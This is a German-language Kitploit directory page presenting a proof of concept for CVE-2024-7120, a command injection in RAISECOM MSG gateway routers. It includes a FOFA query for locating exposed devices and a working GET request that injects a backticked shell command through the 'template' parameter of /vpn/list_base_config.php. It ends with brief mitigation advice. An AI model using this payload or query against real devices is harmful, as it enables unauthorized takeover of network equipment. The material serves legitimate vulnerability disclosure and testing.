Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-7120 — ⚠️⚠️ CVE-2024-7120 Befehlseinschleusung-Schwachstelle in RAISECOM Gateway-Geräten | Kitploit
Tools/GitHubGitHub/gh-ost00/cve-2024-7120
IoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubgh-ost00/cve-2024-7120

CVE-2024-7120

⚠️⚠️ CVE-2024-7120 Befehlseinschleusung-Schwachstelle in RAISECOM Gateway-Geräten

Repository anzeigen
82vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Raisecom Devices Command Injection (CVE-2024-7120) Proof of concept!

Übersicht

Eine Command Injection-Sicherheitslücke wurde in den RAISECOM Gateway-Geräten der Modelle MSG1200, MSG2100E, MSG2200 und MSG2300 identifiziert. Diese Schwachstelle ermöglicht es entfernten Angreifern, über die Weboberfläche beliebige Befehle auf dem System auszuführen. Das Problem liegt im Skript list_base_config.php, insbesondere über den Parameter template, und betrifft über 25.112 Geräte im Internet.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

banner

Betroffene Geräte

Hardware

  • RAISECOM Gateway Modelle MSG1200, MSG2100E, MSG2200, MSG2300

Software

  • 3.90

Betroffene Komponenten

URI: /vpn/list_base_config.php

Beschreibung: Das Skript list_base_config.php ist eine webbasierte Schnittstellenkomponente von RAISECOM Gateway-Geräten, die zur Verwaltung von VPN-Konfigurationen verwendet wird. Die identifizierte Schwachstelle entsteht durch unsachgemäße Handhabung des Parameters template in diesem Skript. Dieser Parameter kann aufgrund unzureichender Eingabebereinigung ausgenutzt werden, um beliebige Befehle auf dem Betriebssystem des Geräts auszuführen.

CWE

CWE-77: Command Injection

Ausnutzung

Hier ist ein Beispiel, wie die Schwachstelle mit einem curl-Befehl ausgenutzt werden kann:

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

In diesem Beispiel sendet der curl-Befehl eine bösartige HTTP-GET-Anfrage an das Skript list_base_config.php. Die Anfrage nutzt den Parameter template, um einen Befehl auszuführen.

Tatsächliches Ergebnis

Beispiel 1

banner

Beispiel 2

banner

Empfehlungen

  1. Eingabevalidierung: Implementieren Sie strenge Validierungsprüfungen für alle Benutzereingaben, insbesondere solche, die Systembefehle oder Dateipfade beeinflussen können.
  2. Zugriffskontrollen: Beschränken Sie den Zugriff auf die Weboberfläche des Geräts auf vertrauenswürdige Netzwerke und authentifizierte Benutzer.
Tool herunterladen